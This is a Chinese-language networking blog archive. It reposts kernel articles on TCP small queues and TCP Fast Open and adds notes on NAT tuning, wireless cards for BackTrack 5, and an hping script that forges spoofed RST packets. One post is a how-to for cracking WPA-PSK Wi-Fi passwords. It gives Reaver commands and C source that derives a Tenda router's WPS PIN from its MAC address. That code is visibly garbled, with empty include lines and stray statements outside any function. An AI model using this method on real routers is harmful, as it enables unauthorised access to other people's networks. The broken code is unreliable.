2012年10月29日 星期一

TCP small queues


TCP small queues是另一個減少網絡擁堵的機制,它的目標在於減少xmit queues (qdisc & device queues)中TCP包的數量,來減少RTT和cwnd bias,以此解決部分網絡擁堵情況。我們可以在不降低名義帶寬的情況下,減少每一個批量發送者的緩衝區:每Gbit< 1ms (相比於50ms with TSO)以及每100Mbit < 8ms (相比於132 ms)

By Jonathan Corbet
July 17, 2012
The "bufferbloat" problem is the result of excessive buffering in the network stack; it leads to long latencies and poor reliability in the network as a whole. Fixing it is a matter of buffering less data in each system between any two endpoints—a task that sounds simple, but proves to be more challenging than one might expect. It turns out that buffering can show up in many surprising places in the networking stack; tracking all of these places down and fixing them is not always easy.A number of bloat-fighting changes have gone into the kernel over the last year. The CoDel queue management algorithm works to prevent packets from building up in router queues over time. At a much lower level, byte queue limits put a cap on the amount of data that can be waiting to go out a specific network interface. Byte queue limits work only at the device queue level, though, while the networking stack has other places—such as the queueing discipline level—where buffering can happen. So there would be value in an implementation that could limit buffering at levels above the device queue.
Eric Dumazet's TCP small queues patch looks like it should be able to fill at least part of that gap. It limits the amount of data that can be queued for transmission by any given socket regardless of where the data is queued, so it shouldn't be fooled by buffers lurking in the queueing, traffic control, or netfilter code. That limit is set by a new sysctl knob found at:

    /proc/sys/net/ipv4/tcp_limit_output_bytes
The default value of this limit is 128KB; it could be set lower on systems where latency is the primary concern.
The networking stack already tracks the amount of data waiting to be transmitted through any given socket; that value lives in thesk_wmem_alloc field of struct sock. So applying a limit is relatively easy; tcp_write_xmit() need only look to see ifsk_wmem_alloc is above the limit. If that is the case, the socket is marked as being throttled and no more packets are queued.
The harder part is figuring out when some space opens up and it is possible to add more packets to the queue. The time when queue space becomes free is when a queued packet is freed. So Eric's patch overrides the normal struct sk_buff destructor when an output limit is in effect; the new destructor can check to see whether it is time to queue more data for the relevant socket. The only problem is that this destructor can be called from deep within the network stack with important locks already held, so it cannot queue new data directly. So Eric had to add a new tasklet to do the actual job of queuing new packets.
It seems that the patch is having the intended result:

Results on my dev machine (tg3 nic) are really impressive, using standard pfifo_fast, and with or without TSO/GSO. Without reduction of nominal bandwidth. I no longer have 3MBytes backlogged in qdisc by a single netperf session, and both side socket autotuning no longer use 4 Mbytes.
He also ran some tests over a 10Gb link and was able to get full wire speed, even with a relatively small output limit.
There are some outstanding questions, still. For example, Tom Herbert asked about how this mechanism interacts with more complex queuing disciplines; that question will take more time and experimentation to answer. Tom also suggested that the limit could be made dynamic and tied to the lower-level byte queue limits. Still, the patch seems like an obvious win, so it has already been pulled into the net-next tree for the 3.6 kernel. The details can be worked out later, and the feature can always be turned off by default if problems emerge during the 3.6 development cycle.

TCP Fast Open: expediting web services

“Fast Open”是建立TCP鏈接的最優選擇,相比於一般TCP會話能夠減少一個RTT(round time trip),在訪問流行網站時可以提速4%-41%。但這一版本僅加入了客戶端的TFO支持。

By Michael Kerrisk
August 1, 2012
Much of today's Internet traffic takes the form of short TCP data flows that consist of just a few round trips exchanging data segments before the connection is terminated. The prototypical example of this kind of short TCP conversation is the transfer of web pages over the Hypertext Transfer Protocol (HTTP).
The speed of TCP data flows is dependent on two factors: transmission delay (the width of the data pipe) and propagation delay (the time that the data takes to travel from one end of the pipe to the other). Transmission delay is dependent on network bandwidth, which has increased steadily and substantially over the life of the Internet. On the other hand, propagation delay is a function of router latencies, which have not improved to the same extent as network bandwidth, and the speed of light, which has remained stubbornly constant. (At intercontinental distances, this physical limitation means that—leaving aside router latencies—transmission through the medium alone requires several milliseconds.) The relative change in the weighting of these two factors means that over time the propagation delay has become a steadily larger component in the overall latency of web services. (This is especially so for many web pages, where a browser often opens several connections to fetch multiple small objects that compose the page.)
Reducing the number of round trips required in a TCP conversation has thus become a subject of keen interest for companies that provide web services. It is therefore unsurprising that Google should be the originator of a series of patches to the Linux networking stack to implement the TCP Fast Open (TFO) feature, which allows the elimination of one round time trip (RTT) from certain kinds of TCP conversations. According to the implementers (in "TCP Fast Open", CoNEXT 2011 [PDF]), TFO could result in speed improvements of between 4% and 41% in the page load times on popular web sites.
We first wrote about TFO back in September 2011, when the idea was still in the development stage. Now that the TFO implementation is starting to make its way into the kernel, it's time to visit it in more detail.

The TCP three-way handshake

To understand the optimization performed by TFO, we first need to note that each TCP conversation begins with a round trip in the form of the so-called three-way handshake. The three-way handshake is initiated when a client makes a connection request to a server. At the application level, this corresponds to a client performing a connect() system call to establish a connection with a server that has previously bound a socket to a well-known address and then called accept() to receive incoming connections. Figure 1 shows the details of the three-way handshake in diagrammatic form.

[TCP Three-Way Handshake]
Figure 1: TCP three-way handshake between a client and a serverDuring the three-way handshake, the two TCP end-points exchange SYN (synchronize) segments containing options that govern the subsequent TCP conversation—for example, the maximum segment size (MSS), which specifies the maximum number of data bytes that a TCP end-point can receive in a TCP segment. The SYN segments also contain the initial sequence numbers (ISNs) that each end-point selects for the conversation (labeled M and N in Figure 1).
The three-way handshake serves another purpose with respect to connection establishment: in the (unlikely) event that the initial SYN is duplicated (this may occur, for example, because underlying network protocols duplicate network packets), then the three-way handshake allows the duplication to be detected, so that only a single connection is created. If a connection was established before completion of the three-way handshake, then a duplicate SYN could cause a second connection to be created.
The problem with current TCP implementations is that data can only be exchanged on the connection after the initiator of the connection has received an ACK (acknowledge) segment from the peer TCP. In other words, data can be sent from the client to the server only in the third step of the three-way handshake (the ACK segment sent by the initiator). Thus, one full round trip time is lost before data is even exchanged between the peers. This lost RTT is a significant component of the latency of short web conversations.
Applications such as web browsers try to mitigate this problem using HTTP persistent connections, whereby the browser holds a connection open to the web server and reuses that connection for later HTTP requests. However, the effectiveness of this technique is decreased because idle connections may be closed before they are reused. For example, in order to limit resource usage, busy web servers often aggressively close idle HTTP connections. The result is that a high proportion of HTTP requests are cold, requiring a new TCP connection to be established to the web server.

Eliminating a round trip

Theoretically, the initial SYN segment could contain data sent by the initiator of the connection: RFC 793, the specification for TCP, doespermit data to be included in a SYN segment. However, TCP is prohibited from delivering that data to the application until the three-way handshake completes. This is a necessary security measure to prevent various kinds of malicious attacks. For example, if a malicious client sent a SYN segment containing data and a spoofed source address, and the server TCP passed that segment to the server application before completion of the three-way handshake, then the segment would both cause resources to be consumed on the server and cause (possibly multiple) responses to be sent to the victim host whose address was spoofed.
The aim of TFO is to eliminate one round trip time from a TCP conversation by allowing data to be included as part of the SYN segment that initiates the connection. TFO is designed to do this in such a way that the security concerns described above are addressed. (T/TCP, a mechanism designed in the early 1990s, also tried to provide a way of short circuiting the three-way handshake, but fundamentalsecurity flaws in its design meant that it never gained wide use.)
On the other hand, the TFO mechanism does not detect duplicate SYN segments. (This was a deliberate choice made to simplify design of the protocol.) Consequently, servers employing TFO must be idempotent—they must tolerate the possibility of receiving duplicate initialSYN segments containing the same data and produce the same result regardless of whether one or multiple such SYN segments arrive. Many web services are idempotent, for example, web servers that serve static web pages in response to URL requests from browsers, or web services that manipulate internal state but have internal application logic to detect (and ignore) duplicate requests from the same client.
In order to prevent the aforementioned malicious attacks, TFO employs security cookies (TFO cookies). The TFO cookie is generated once by the server TCP and returned to the client TCP for later reuse. The cookie is constructed by encrypting the client IP address in a fashion that is reproducible (by the server TCP) but is difficult for an attacker to guess. Request, generation, and exchange of the TFO cookie happens entirely transparently to the application layer.
At the protocol layer, the client requests a TFO cookie by sending a SYN segment to the server that includes a special TCP option asking for a TFO cookie. The SYN segment is otherwise "normal"; that is, there is no data in the segment and establishment of the connection still requires the normal three-way handshake. In response, the server generates a TFO cookie that is returned in the SYN-ACK segment that the server sends to the client. The client caches the TFO cookie for later use. The steps in the generation and caching of the TFO cookie are shown in Figure 2.

[Generating the TFO cookie]
Figure 2: Generating the TFO cookieAt this point, the client TCP now has a token that it can use to prove to the server TCP that an earlier three-way handshake to the client's IP address completed successfully.
For subsequent conversations with the server, the client can short circuit the three-way handshake as shown in Figure 3.

[Employing the TFO cookie]
Figure 3: Employing the TFO cookieThe steps shown in Figure 3 are as follows:

  1. The client TCP sends a SYN that contains both the TFO cookie (specified as a TCP option) and data from the client application.
  2. The server TCP validates the TFO cookie by duplicating the encryption process based on the source IP address of the new SYN. If the cookie proves to be valid, then the server TCP can be confident that this SYN comes from the address it claims to come from. This means that the server TCP can immediately pass the application data to the server application.
  3. From here on, the TCP conversation proceeds as normal: the server TCP sends a SYN-ACK segment to the client, which the client TCP then acknowledges, thus completing the three-way handshake. The server TCP can also send response data segments to the client TCP before it receives the client's ACK.
In the above steps, if the TFO cookie proves not to be valid, then the server TCP discards the data and sends a segment to the client TCP that acknowledges just the SYN. At this point, the TCP conversation falls back to the normal three-way handshake. If the client TCP is authentic (not malicious), then it will (transparently to the application) retransmit the data that it sent in the SYN segment.
Comparing Figure 1 and Figure 3, we can see that a complete RTT has been saved in the conversation between the client and server. (This assumes that the client's initial request is small enough to fit inside a single TCP segment. This is true for most requests, but not all. Whether it might be technically possible to handle larger requests—for example, by transmitting multiple segments from the client before receiving the server's ACK—remains an open question.)
There are various details of TFO cookie generation that we don't cover here. For example, the algorithm for generating a suitably secure TFO cookie is implementation-dependent, and should (and can) be designed to be computable with low processor effort, so as not to slow the processing of connection requests. Furthermore, the server should periodically change the encryption key used to generate the TFO cookies, so as to prevent attackers harvesting many cookies over time to use in a coordinated attack against the server.
There is one detail of the use of TFO cookies that we will revisit below. Because the TFO mechanism allows a client that submits a valid TFO cookie to trigger resource usage on the server before completion of the three-way handshake, the server can be the target of resource-exhaustion attacks. To prevent this possibility, the server imposes a limit on the number of pending TFO connections that have not yet completed the three-way handshake. When this limit is exceeded, the server ignores TFO cookies and falls back to the normal three-way handshake for subsequent client requests until the number of pending TFO connections falls below the limit; this allows the server to employ traditional measures against SYN-flood attacks.

The user-space API

As noted above, the generation and use of TFO cookies is transparent to the application level: the TFO cookie is automatically generated during the first TCP conversation between the client and server, and then automatically reused in subsequent conversations. Nevertheless, applications that wish to use TFO must notify the system using suitable API calls. Furthermore, certain system configuration knobs need to be turned in order to enable TFO.
The changes required to a server in order to support TFO are minimal, and are highlighted in the code template below.
    sfd = socket(AF_INET, SOCK_STREAM, 0);   // Create socket

    bind(sfd, ...);                          // Bind to well known address
    
    int qlen = 5;                            // Value to be chosen by application
    setsockopt(sfd, SOL_TCP, TCP_FASTOPEN, &qlen, sizeof(qlen));
    
    listen(sfd, ...);                        // Mark socket to receive connections

    cfd = accept(sfd, NULL, 0);              // Accept connection on new socket

    // read and write data on connected socket cfd

    close(cfd);
Setting the TCP_FASTOPEN socket option requests the kernel to use TFO for the server's socket. By implication, this is also a statement that the server can handle duplicated SYN segments in an idempotent fashion. The option value, qlen, specifies this server's limit on the size of the queue of TFO requests that have not yet completed the three-way handshake (see the remarks on prevention of resource-exhaustion attacks above).
The changes required to a client in order to support TFO are also minor, but a little more substantial than for a TFO server. A normal TCP client uses separate system calls to initiate a connection and transmit data: connect() to initiate the connection to a specified server address and (typically) write() or send() to transmit data. Since a TFO client combines connection initiation and data transmission in a single step, it needs to employ an API that allows both the server address and the data to be specified in a single operation. For this purpose, the client can use either of two repurposed system calls: sendto() and sendmsg().
The sendto() and sendmsg() system calls are normally used with datagram (e.g., UDP) sockets: since datagram sockets are connectionless, each outgoing datagram must include both the transmitted data and the destination address. Since this is the same information that is required to initiate a TFO connection, these system calls are recycled for the purpose, with the requirement that the newMSG_FASTOPEN flag must be specified in the flags argument of the system call. A TFO client thus has the following general form:
    sfd = socket(AF_INET, SOCK_STREAM, 0);
    
    sendto(sfd, data, data_len, MSG_FASTOPEN, 
                (struct sockaddr *) &server_addr, addr_len);
        // Replaces connect() + send()/write()
    
    // read and write further data on connected socket sfd

    close(sfd);
If this is the first TCP conversation between the client and server, then the above code will result in the scenario shown in Figure 2, with the result that a TFO cookie is returned to the client TCP, which then caches the cookie. If the client TCP has already obtained a TFO cookie from a previous TCP conversation, then the scenario is as shown in Figure 3, with client data being passed in the initial SYNsegment and a round trip being saved.
In addition to the above APIs, there are various knobs—in the form of files in the /proc/sys/net/ipv4 directory—that control TFO on a system-wide basis:

  • The tcp_fastopen file can be used to view or set a value that enables the operation of different parts of the TFO functionality. Setting bit 0 (i.e., the value 1) in this value enables client TFO functionality, so that applications can request TFO cookies. Setting bit 1 (i.e., the value 2) enables server TFO functionality, so that server TCPs can generate TFO cookies in response to requests from clients. (Thus, the value 3 would enable both client and server TFO functionality on the host.)
  • The tcp_fastopen_cookies file can be used to view or set a system-wide limit on the number of pending TFO connections that have not yet completed the three-way handshake. While this limit is exceeded, all incoming TFO connection attempts fall back to the normal three-way handshake.

Current state of TCP fast open

Currently, TFO is an Internet Draft with the IETF. Linux is the first operating system that is adding support for TFO. However, as yet that support remains incomplete in the mainline kernel. The client-side support has been merged for Linux 3.6. However, the server-side TFO support has not so far been merged, and from conversations with the developers it appears that this support won't be added in the current merge window. Thus, an operational TFO implementation is likely to become available only in Linux 3.7.
Once operating system support is fully available, a few further steps need to be completed to achieve wider deployment of TFO on the Internet. Among these is assignment by IANA of a dedicated TCP Option Number for TFO. (The current implementation employs theTCP Experimental Option Number facility as a placeholder for a real TCP Option Number.)
Then, of course, suitable changes must be made to both clients and servers along the lines described above. Although each client-server pair requires modification to employ TFO, it's worth noting that changes to just a small subset of applications—most notably, web servers and browsers—will likely yield most of the benefit visible to end users. During the deployment process, TFO-enabled clients may attempt connections with servers that don't understand TFO. This case is handled gracefully by the protocol: transparently to the application, the client and server will fall back to a normal three-way handshake.
There are other deployment hurdles that may be encountered. In their CoNEXT 2011 paper, the TFO developers note that a minority of middle-boxes and hosts drop TCP SYN segments containing unknown (i.e., new) TCP options or data. Such problems are likely to diminish as TFO is more widely deployed, but in the meantime a client TCP can (transparently) handle such problems by falling back to the normal three-way handshake on individual connections, or generally falling back for all connections to specific server IP addresses that show repeated failures for TFO.

Conclusion

TFO is promising technology that has the potential to make significant reductions in the latency of billions of web service transactions that take place each day. Barring any unforeseen security flaws (and the developers seem to have considered the matter quite carefully), TFO is likely to see rapid deployment in web browsers and servers, as well as in a number of other commonly used web applications.

2012年10月5日 星期五

BT5 支援網卡List


測試通過的網卡列表

  • AWUS036H (rtl8187, r8187) – both mac80211 and IEEE drivers – 测试通过
  • AWUS036NH (Ralink RT2870/3070) – using the mac80211 rt2×00usb drivers – 测试通过
  • BCM4312 802.11b/g LP-PHY (rev 01) – using the mac80211 b43, works well – 测试通过
  • Rockland N3 – (Ralink RT2870/3070) – using the mac80211 rt2×00usb drivers -测试通过
  • Edimax EW-7318USG USB – (Ralink RT2501/RT2573) – using the mac80211 rt2500usb/rt73usb drivers -测试通过
  • ASUSTek Computer, Inc. RT2573 – using the mac80211 rt2500usb/rt73usb drivers -测试通过
  • Linksys WUSB54GC ver 3 – using the mac80211 rt2800usb drivers -测试通过
  • Ubiquiti SRC – using the mac80211 ath9k drivers-测试通过
  • Internal Intel Corporation PRO/Wireless 3945ABG – using the mac80211 iwl3945 drivers-测试通过
  • Dlink WNA-2330 PCMCIA – using the mac80211 ath5k drivers-测试通过
  • Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) – using the mac80211 ath9k drivers-测试通过
  • Netgear wg111v2 – using the mac80211 rtl8187 drivers-测试通过
  • ZyXEL AG-225H v2 – using the mac80211 zd1211 drivers – 测试通过
  • Intel 4965/5xxx – using the iwlagn drivers – 测试通过

2012年10月4日 星期四

利用hping工具來清除ESTABLISHED狀態conntrack


 通過過濾ip_conntrack表得到ESTABLISHED狀態過多的ip,hping工具將這些ip從表中清理掉...

  

  安裝: ./configure;make;make install

  hping清理IP conntrack script:(此script修改連結狀態為closed)


    #!/bin/sh
      if [ -z $1 ] ; then
              echo "NO INPUT IP"
              exit
      fi
      grep -E "^tcp .{10,25}ESTABLISHED src=$1 " /proc/net/ip_conntrack | while read line; do
      S_IP=`echo $line | awk '{print substr($5,5)}'`
      S_SOCK=`echo $line | awk '{print substr($7,7)}'`
      D_IP=`echo $line | awk '{print substr($6,5)}'`
      D_SOCK=`echo $line | awk '{print substr($8,7)}'`
      echo "$S_IP:$S_SOCK $D_IP:$D_SOCK" 
      hping2 $D_IP -R -s $S_SOCK -p $D_SOCK -a $S_IP -k -c 1 > /home/huaying/1.log 2>&1 & 
      done




實際上還是用 conntrack tool 去 flush table比較快 @_@"

Linux NAT 優化設定


  #echo "1024 65000" > /proc/sys/net/ipv4/ip_local_port_range
  #echo "100 1200 128 512 15 5000 500 1884 2">/proc/sys/vm/bdflush
  #echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
  #echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
  #echo "1048576" > /proc/sys/net/ipv4/netfilter/ip_conntrack_max
  #echo "1" > /proc/sys/net/ipv4/ip_forward
  #echo "268435456" >/proc/sys/kernel/shmall
  #echo "536870912" >/proc/sys/kernel/shmmax
  #echo "600" > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_established
  #echo "1024" > /proc/sys/net/ipv4/neigh/default/gc_thresh1
  #echo "2048" > /proc/sys/net/ipv4/neigh/default/gc_thresh2
  #echo "4096" > /proc/sys/net/ipv4/neigh/default/gc_thresh3
  #echo "52428800" > /proc/sys/net/ipv4/route/max_size
  #echo "1" > /proc/sys/net/ipv4/conf/all/proxy_arp
  #echo "1" > /proc/sys/net/ipv4/tcp_window_scaling 

2012年10月3日 星期三

用Reaver加PIN碼秒殺WPA-PSK密碼


 之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake后挂字典爆破方式,而能否破解出wpa密码完全依赖于字典强度了。除了该方式外还有一个更有效的办法,就是使用路由PIN码然后使用BT5下自带的Reaver工具秒破WPA-PSK密码!
在已知PIN码的情况下可以在BT5下使用 reaver -i mon0 -b AP‘s Mac -p pin 直接秒破!
现在比较难的就是怎么得到PIN的问题了,经常关注无线这方面的朋友应该知道现在腾达和磊科产品有保PIN算法漏洞,如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值,然后使用PIN值直接连接或者继续使用PIN值加reaver破解出wpa-psk。
除此之外,根据PIN特点同样也可以使用Reaver来穷举,pin码是一个8位数前四位是随机生成的而后4位是3个数字加1个checksum大大降低了穷举所需要的时间。
在BT5下可以使用 reaver -i mon0 -b AP's Mac -vv 来破解,这个过程可能需要花很多个小时,在网上有看到是3-10个小时,具体的我还未验证。reaver在此过程中还会保存进度(/usr/local/etc/reaver/AP’s MAC.wpc)到文件。
不过使用PIN方法破解WPA-PSK密码有一个限制,就是AP必须开启了QSS、WPS功能!我们可以在扫描AP的时候判断目标AP是否开启了QSS、WPS功能,如下图使用airodump-ng扫描时候在MB栏中后面有个“.”的就是。
或者在win7下面,连接AP时候在密码输入框下面有“通过按路由器按钮也可以连接”字样也是开启了QSS、wps的。

“C83A35”或“00B00C”打头路由PIN计算工具源码,大家可以自己编译:
//Computes PIN code starts with OUI "C83A35" and "00B00C"
//Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively.
//Coded by Zhaochunsheng - iBeini.com
//Modified by Lingxi - WiFiBETA.COM


#include
#include
#include

int main()
{

    unsigned int wps_pin_checksum(unsigned int pin);
    int PIN = 0;

 //   printf("ComputePIN-C83A35\n");
    printf("Description:\n");
    printf("If your wireless router MAC address start with \"C83A35\" or \"00B00C\",\n");
    printf("type the other six digits, you might be able to get the \n");
    printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
    printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n");
    printf("Modified by Lingxi - WiFiBETA.COM\n\n");
//Translated to Chinese
 printf("说明:\n");
 printf("如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头,\n");
 printf("输入后六位MAC地址(不分大小写)您或许可以获得该路由的WPS PIN密钥!\n");
 printf("祝你好运!\n\n");
 printf("由赵春生编写于2012年4月7日  Http://iBeini.com\n");
 printf("由灵曦修改并汉化  WiFiBETA.COM\n\n");
    printf("请输入后六位MAC地址(HEX):\n");
    printf("Input the last 6 digits of MAC Address(HEX):");
    scanf("%x",&PIN);  
    printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));
 
    return 0;
}
 
unsigned int wps_pin_checksum(unsigned int pin)
{
unsigned int accum = 0;
while (pin)
{
accum += 3 * (pin % 10);
pin /= 10;
accum += pin % 10;
pin /= 10;
}
 
    return (10 - accum % 10) % 10;
}


  printf("您输入的后六位MAC地址是 %X\n",PIN);
  printf("Last 6 digits of MAC Address(HEX) are: %X\n",PIN);


OUI search

EX: http://standards.ieee.org/cgi-bin/ouisearch?14-d6-4d

How to use simple speedtest in RaspberryPi CLI

  pi@ChunchaiRPI2:/tmp $  wget -O speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py --2023-06-26 10:4...